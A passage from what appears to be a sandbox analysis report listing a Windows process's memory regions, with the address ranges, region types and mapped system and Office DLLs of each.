0x7fef5290000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 444 start_va = 0x8810000 end_va = 0x8810fff entry_point = 0x8810000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 445 start_va = 0x8820000 end_va = 0x8821fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008820000" filename = "" Region: id = 446 start_va = 0x8830000 end_va = 0x8830fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008830000" filename = "" Region: id = 447 start_va = 0x8840000 end_va = 0x8840fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008840000" filename = "" Region: id = 448 start_va = 0xa990000 end_va = 0xaa8ffff entry_point = 0x0 region_type = private name = "private_0x000000000a990000" filename = "" Region: id = 449 start_va = 0x7fef7fc0000 end_va = 0x7fef803ffff entry_point = 0x7fef7fc0000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 450 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 451 start_va = 0x8f40000 end_va = 0x8f95fff entry_point = 0x8f40000 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 452 start_va = 0x7fef8040000 end_va = 0x7fef804efff entry_point = 0x7fef8040000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 453 start_va = 0x7fefba50000 end_va = 0x7fefba5afff entry_point = 0x7fefba50000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 454 start_va = 0x3df0000 end_va = 0x3df3fff entry_point = 0x3df0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 455 start_va = 0x90f0000 end_va = 0x91effff entry_point = 0x0 region_type = private name = "private_0x00000000090f0000" filename = "" Region: id = 456 start_va = 0x9200000 end_va = 0x92fffff entry_point = 0x0 region_type = private name = "private_0x0000000009200000" filename = "" Region: id = 457 start_va = 0xa5c0000 end_va = 0xa7bffff entry_point = 0x0 region_type = private name = "private_0x000000000a5c0000" filename = "" Region: id = 458 start_va = 0xa8d0000 end_va = 0xa9cffff entry_point = 0x0 region_type = private name = "private_0x000000000a8d0000" filename = "" Region: id = 459 start_va = 0xaae0000 end_va = 0xabdffff entry_point = 0x0 region_type = private name = "private_0x000000000aae0000" filename = "" Region: id = 460 start_va = 0x7fef7470000 end_va = 0x7fef760bfff entry_point = 0x7fef7470000 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll") Region: id = 461 start_va = 0x7fef1c80000 end_va = 0x7fef1cf2fff entry_point = 0x7fef1c80000 region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll") Region: id = 462 start_va = 0x3e00000 end_va = 0x3e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 463 start_va = 0x7fef9980000 end_va = 0x7fef9997fff entry_point = 0x7fef9980000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 464 start_va = 0xabe0000 end_va = 0xbf35fff entry_point = 0xabe0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 465 start_va = 0x71720000 end_va = 0x72a75fff entry_point = 0x71720000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 466 start_va = 0x7fef9dc0000 end_va = 0x7fef9dc9fff entry_point = 0x7fef9dc0000 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 467 start_va = 0x7fef1c50000 end_va = 0x7fef1c71fff entry_point = 0x7fef1c50000 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 468 start_va = 0x3e10000 end_va = 0x3e10fff entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 469 start_va = 0x7fef7b00000 end_va = 0x7fef7bedfff entry_point = 0x7fef7b00000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 470 start_va = 0x3e20000 end_va = 0x3e21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e20000" filename = "" Region: id = 471 start_va = 0x7fee9d60000 end_va = 0x7fee9fd0fff entry_point = 0x7fee9d60000 region_type = mapped_file name = "wpdshext.dll" filename = "\\Windows\\System32\\wpdshext.dll" (normalized: "c:\\windows\\system32\\wpdshext.dll") Region: id = 472 start_va = 0x7fef7f60000 end_va = 0x7fef7f9afff entry_point = 0x7fef7f60000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 473 start_va = 0x3e30000 end_va = 0x3e30fff entry_point = 0x0 region_type = private name = "private_0x0000000003e30000" filename = "" Region: id = 474 start_va = 0x3e40000 end_va = 0x3e40fff entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 475 start_va = 0x3e50000 end_va = 0x3e51fff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 476 start_va = 0x3e60000 end_va = 0x3e68fff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 477 start_va = 0x3e70000 end_va = 0x3e72fff entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 478 start_va = 0x3e80000 end_va = 0x3e82fff entry_point = 0x0 region_type = private name = "private_0x0000000003e80000" filename = "" Region: id = 479 start_va = 0x3f70000 end_va = 0x406ffff entry_point = 0x0 region_type = private name = "private_0x0000000003f70000" filename = "" Region: id = 480 start_va = 0x7fef9a40000 end_va = 0x7fef9afcfff entry_point = 0x7fef9a40000 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 481 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 482 start_va = 0xa9d0000 end_va = 0xaacffff entry_point = 0x0 region_type = private name = "private_0x000000000a9d0000" filename = "" Region: id = 483 start_va = 0x7fef80e0000 end_va = 0x7fef8114fff entry_point = 0x7fef80e0000 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 484 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 485 start_va = 0x7fef1c20000 end_va = 0x7fef1c46fff entry_point = 0x7fef1c20000 region_type = mapped_file name = "ehstorapi.dll" filename = "\\Windows\\System32\\EhStorAPI.dll" (normalized: "c:\\windows\\system32\\ehstorapi.dll") Region: id = 486 start_va = 0x2b30000 end_va = 0x2b30fff entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 487 start_va = 0x2b40000 end_va = 0x2b41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b40000" filename = "" Region: id = 488 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003350000" filename = "" Region: id = 489 start_va = 0x3570000 end_va = 0x3570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003570000" filename = "" Region: id = 490 start_va = 0x3590000 end_va = 0x3590fff entry_point = 0x0 region_type = private name = "private_0x0000000003590000" filename = "" Region: id = 491 start_va = 0x3e90000 end_va = 0x3e90fff entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 492 start_va = 0x9d90000 end_va = 0x9e3afff entry_point = 0x9d90000 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 493 start_va = 0x9f70000 end_va = 0x9feffff entry_point = 0x0 region_type = private name = "private_0x0000000009f70000" filename = "" Region: id = 494 start_va = 0xa090000 end_va = 0xa10ffff entry_point = 0x0 region_type = private name = "private_0x000000000a090000" filename = "" Region: id = 495 start_va = 0xabe0000 end_va = 0xbbdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000abe0000" filename = "" Region: id = 496 start_va = 0x7fef1d70000 end_va = 0x7fef1e7dfff entry_point = 0x7fef1d70000 region_type = mapped_file name = "oledb32.dll" filename = "\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32.dll") Region: id = 497 start_va = 0x7fef2340000 end_va = 0x7fef2367fff entry_point = 0x7fef2340000 region_type = mapped_file name = "msdart.dll" filename = "\\Windows\\System32\\msdart.dll" (normalized: "c:\\windows\\system32\\msdart.dll") Region: id = 498 start_va = 0x7fefd500000 end_va = 0x7fefd521fff entry_point = 0x7fefd500000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 499 start_va = 0xa7a0000 end_va = 0xa81ffff entry_point = 0x0 region_type = private name = "private_0x000000000a7a0000" filename = "" Region: id = 500 start_va = 0x75500000 end_va = 0x75513fff entry_point = 0x75500000 region_type = mapped_file name = "oledb32r.dll" filename = "\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32r.dll") Region: id = 501 start_va = 0x7fee9e50000 end_va = 0x7fee9ffffff entry_point = 0x7fee9e50000 region_type = mapped_file name = "comsvcs.dll" filename = "\\Windows\\System32\\comsvcs.dll" (normalized: "c:\\windows\\system32\\comsvcs.dll") Region: id = 502 start_va = 0x7feea740000 end_va = 0x7feea75dfff entry_point = 0x7feea740000 region_type = mapped_file name = "hlink.dll" filename = "\\Windows\\System32\\hlink.dll" (normalized: "c:\\windows\\system32\\hlink.dll") Region: id = 503 start_va = 0xbbe0000 end_va = 0xbf22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000bbe0000" filename = "" Region: id = 504 start_va = 0x75860000 end_va = 0x75862fff entry_point = 0x75860000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 505 start_va = 0x7fefaaa0000 end_va = 0x7fefaaaffff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 506 start_va = 0x7feec6d0000 end_va = 0x7feecd5afff entry_point = 0x7feec6d0000 region_type = mapped_file name = "csi.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\Csi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\csi.dll") Region: id = 507 start_va = 0x7fefb540000 end_va = 0x7fefb54afff entry_point = 0x7fefb540000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 508 start_va = 0x7fefb550000 end_va = 0x7fefb576fff entry_point = 0x7fefb550000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 509 start_va = 0x7fefe0a0000 end_va = 0x7fefe0a7fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 510 start_va = 0x7feff950000 end_va = 0x7feff99cfff entry_point = 0x7feff950000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 511 start_va = 0x7fefbb60000 end_va = 0x7fefbb8ffff entry_point = 0x7fefbb60000 region_type = mapped_file name = "peerdist.dll" filename = "\\Windows\\System32\\PeerDist.dll" (normalized: "c:\\windows\\system32\\peerdist.dll") Region: id = 512 start_va = 0x7fefce40000 end_va = 0x7fefce5dfff entry_point = 0x7fefce40000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 513 start_va = 0x7fefd580000 end_va = 0x7fefd5aefff entry_point = 0x7fefd580000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 514 start_va = 0x3580000 end_va = 0x358ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003580000" filename = "" Region: id = 515 start_va = 0x35a0000 end_va = 0x35affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000035a0000" filename = "" Region: id = 516 start_va = 0x3dd0000 end_va = 0x3ddffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003dd0000" filename = "" Region: id = 517 start_va = 0x3de0000 end_va = 0x3deffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003de0000" filename = "" Region: id = 518 start_va = 0x9e60000 end_va = 0x9f5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009e60000" filename = "" Region: id = 519 start_va = 0xa5c0000 end_va = 0xa6bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a5c0000" filename = "" Region: id = 520 start_va = 0x7fef2480000 end_va = 0x7fef24eefff entry_point = 0x7fef2480000 region_type = mapped_file name = "aceoledb.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\aceoledb.dll") Region: id = 521 start_va = 0x7feec480000 end_va = 0x7feec6c9fff entry_point = 0x7feec480000 region_type = mapped_file name = "acecore.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\acecore.dll") Region: id = 522 start_va = 0x7fef1a50000 end_va = 0x7fef1b24fff entry_point = 0x7fef1a50000 region_type = mapped_file name = "acewstr.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\1033\\acewstr.dll") Region: id = 523 start_va = 0x3e30000 end_va = 0x3e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e30000" filename = "" Region: id = 524 start_va = 0xbf30000 end_va = 0xff2ffff entry_point = 0x0 region_type = private name = "private_0x000000000bf30000" filename = "" Region: id = 525 start_va = 0xffd0000 end_va = 0x100cffff entry_point = 0x0 region_type = private name = "private_0x000000000ffd0000" filename = "" Region: id = 526 start_va = 0x10230000 end_va = 0x1032ffff entry_point = 0x0 region_type = private name = "private_0x0000000010230000" filename = "" Region: id = 527 start_va = 0x10420000 end_va = 0x1051ffff entry_point = 0x0 region_type = private name = "private_0x0000000010420000" filename = "" Region: id = 528 start_va = 0x7feec3a0000 end_va = 0x7feec479fff entry_point = 0x7feec3a0000 region_type = mapped_file name = "acees.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\acees.dll") Region: id = 529 start_va = 0x7fffff66000 end_va = 0x7fffff67fff entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 530 start_va = 0x7fffff68000 end_va = 0x7fffff69fff entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 531 start_va = 0x7fffff74000 end_va = 0x7fffff75fff entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 532 start_va = 0x7fef2330000 end_va = 0x7fef2336fff entry_point = 0x7fef2330000 region_type = mapped_file name = "vbajet32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\VBAJET32.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\vbajet32.dll") Region: id = 533 start_va = 0x7fef22c0000 end_va = 0x7fef2328fff entry_point = 0x7fef22c0000 region_type = mapped_file name = "expsrv.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\EXPSRV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\expsrv.dll") Region: id = 534 start_va = 0x3e40000 end_va = 0x3e49fff entry_point = 0x3e40000 region_type = mapped_file name = "normnfd.nls" filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls") Region: id = 535 start_va = 0x3e50000 end_va = 0x3e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 536 start_va = 0x3e60000 end_va = 0x3e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 537 start_va = 0x3e70000 end_va = 0x3e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 538 start_va = 0x7fefb820000 end_va = 0x7fefb946fff entry_point = 0x7fefb820000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 539 start_va = 0x3e30000 end_va = 0x3e3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e30000" filename = "" Region: id = 540 start_va = 0x3e80000 end_va = 0x3e8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e80000" filename = "" Region: id = 541 start_va = 0x3ea0000 end_va = 0x3eaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ea0000" filename = "" Region: id = 542 start_va = 0x3eb0000 end_va = 0x3ebffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003eb0000" filename = "" Region: id = 543 start_va = 0x3ec0000 end_va = 0x3ecffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ec0000" filename = "" Region: id = 544 start_va = 0x3ed0000 end_va = 0x3edffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 545 start_va = 0x3ee0000 end_va = 0x3eeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 546 start_va = 0x3f40000 end_va = 0x3f4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f40000" filename = "" Region: id = 547 start_va = 0x3f50000 end_va = 0x3f5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f50000" filename = "" Region: id = 548 start_va = 0x3f60000 end_va = 0x3f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f60000" filename = "" Region: id = 549 start_va = 0x4130000 end_va = 0x4131fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004130000" filename = "" Region: id = 550 start_va = 0x105f0000 end_va = 0x106effff entry_point = 0x0 region_type = private name = "private_0x00000000105f0000" filename = "" Region: id = 551 start_va = 0x7fefa2b0000 end_va = 0x7fefa323fff entry_point = 0x7fefa2b0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 552 start_va = 0x7fefba70000 end_va = 0x7fefba84fff entry_point = 0x7fefba70000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 553 start_va = 0x7fffff64000 end_va = 0x7fffff65fff entry_point = 0x0 region_type = private name = "private_0x000007fffff64000" filename = "" Region: id = 554 start_va = 0x10210000 end_va = 0x1021ffff entry_point = 0x0 region_type = private name = "private_0x0000000010210000" filename = "" Region: id = 555 start_va = 0x7fefa010000 end_va = 0x7fefa01bfff entry_point = 0x7fefa010000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 556 start_va = 0x3e60000 end_va = 0x3e61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e60000" filename = "" Region: id = 557 start_va = 0x4350000 end_va = 0x435ffff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 558 start_va = 0x74330000 end_va = 0x7435afff entry_point = 0x74330000 region_type = mapped_file name = "atl100.dll" filename = "\\Windows\\System32\\atl100.dll" (normalized: "c:\\windows\\system32\\atl100.dll") Region: id = 559 start_va = 0x77d10000 end_va = 0x77d12fff entry_point = 0x77d10000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 560 start_va = 0x7fef91c0000 end_va = 0x7fef93fcfff entry_point = 0x7fef91c0000 region_type = mapped_file name = "grooveex.dll" filename = "\\PROGRA~1\\MICROS~1\\Office15\\GROOVEEX.DLL" (normalized: "c:\\progra~1\\micros~1\\office15\\grooveex.dll") Region: id = 561 start_va = 0x4340000 end_va = 0x4341fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004340000" filename = "" Region: id = 562 start_va = 0x4350000 end_va = 0x4357fff entry_point = 0x4350000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 563 start_va = 0x4360000 end_va = 0x436ffff entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 564 start_va = 0x4370000 end_va = 0x437ffff entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 565 start_va = 0x4980000 end_va = 0x4993fff entry_point = 0x4980000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 566 start_va = 0x49a0000 end_va = 0x49affff entry_point = 0x49a0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 567 start_va = 0x10200000 end_va = 0x1020ffff entry_point = 0x0 region_type = private name = "private_0x0000000010200000" filename = "" Region: id = 568 start_va = 0x7fefd1b0000 end_va = 0x7fefd20afff entry_point = 0x7fefd1b0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 569 start_va = 0x107d0000 end_va = 0x1084ffff entry_point = 0x0 region_type = private name = "private_0x00000000107d0000" filename = "" Region: id = 570 start_va = 0x7fef6090000 end_va = 0x7fef60f1fff entry_point = 0x7fef6090000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 571 start_va = 0x7fef99a0000 end_va = 0x7fef99bbfff entry_point = 0x7fef99a0000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 572 start_va = 0x7fefb5a0000 end_va = 0x7fefb5b0fff entry_point = 0x7fefb5a0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 573 start_va = 0x10970000 end_va = 0x10a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000010970000" filename = "" Region: id = 574 start_va = 0x7fef22b0000 end_va = 0x7fef22b8fff entry_point = 0x7fef22b0000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 575 start_va = 0x7fffff62000 end_va = 0x7fffff63fff entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 576 start_va = 0x56d0000 end_va = 0x56dffff entry_point = 0x0 region_type = private name = "private_0x00000000056d0000" filename = "" Region: id = 577 start_va = 0x7fefab90000 end_va = 0x7fefab97fff entry_point = 0x7fefab90000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 578 start_va = 0x10b60000 end_va = 0x10c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000010b60000" filename = "" Region: id = 579 start_va = 0x7fef99f0000 end_va = 0x7fef9a04fff entry_point = 0x7fef99f0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 580 start_va = 0x7fffff60000 end_va = 0x7fffff61fff entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 581 start_va = 0x7fef99d0000 end_va = 0x7fef99e8fff entry_point = 0x7fef99d0000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 582 start_va = 0x7fefd330000 end_va = 0x7fefd384fff entry_point = 0x7fefd330000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 583 start_va = 0x7fef99c0000 end_va = 0x7fef99cafff entry_point = 0x7fef99c0000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 584 start_va = 0x7fefcd30000 end_va = 0x7fefcd36fff entry_point = 0x7fefcd30000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 585 start_va = 0x7fefd320000 end_va = 0x7fefd326fff entry_point = 0x7fefd320000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 586 start_va = 0x7fefb3f0000 end_va = 0x7fefb442fff entry_point = 0x7fefb3f0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 587 start_va = 0x10d90000 end_va = 0x10e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000010d90000" filename = "" Region: id = 588 start_va = 0x7fefb3a0000 end_va = 0x7fefb3b7fff entry_point = 0x7fefb3a0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 589 start_va = 0x7fefb3c0000 end_va = 0x7fefb3d0fff entry_point = 0x7fefb3c0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 590 start_va = 0x100d0000 end_va = 0x101cffff entry_point = 0x0 region_type = private name = "private_0x00000000100d0000" filename = "" Region: id = 591 start_va = 0x10c70000 end_va = 0x10d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000010c70000" filename = "" Region: id = 592 start_va = 0x10f60000 end_va = 0x1105ffff entry_point = 0x0 region_type = private name = "private_0x0000000010f60000" filename = "" Region: id = 593 start_va = 0x111b0000 end_va = 0x112affff entry_point = 0x0 region_type = private name = "private_0x00000000111b0000" filename = "" Region: id = 594 start_va = 0x7fefd9a0000 end_va = 0x7fefda30fff entry_point = 0x7fefd9a0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 595 start_va = 0x7fffff5a000 end_va = 0x7fffff5bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff5a000" filename = "" Region: id = 596 start_va = 0x7fffff5c000 end_va = 0x7fffff5dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff5c000" filename = "" Region: id 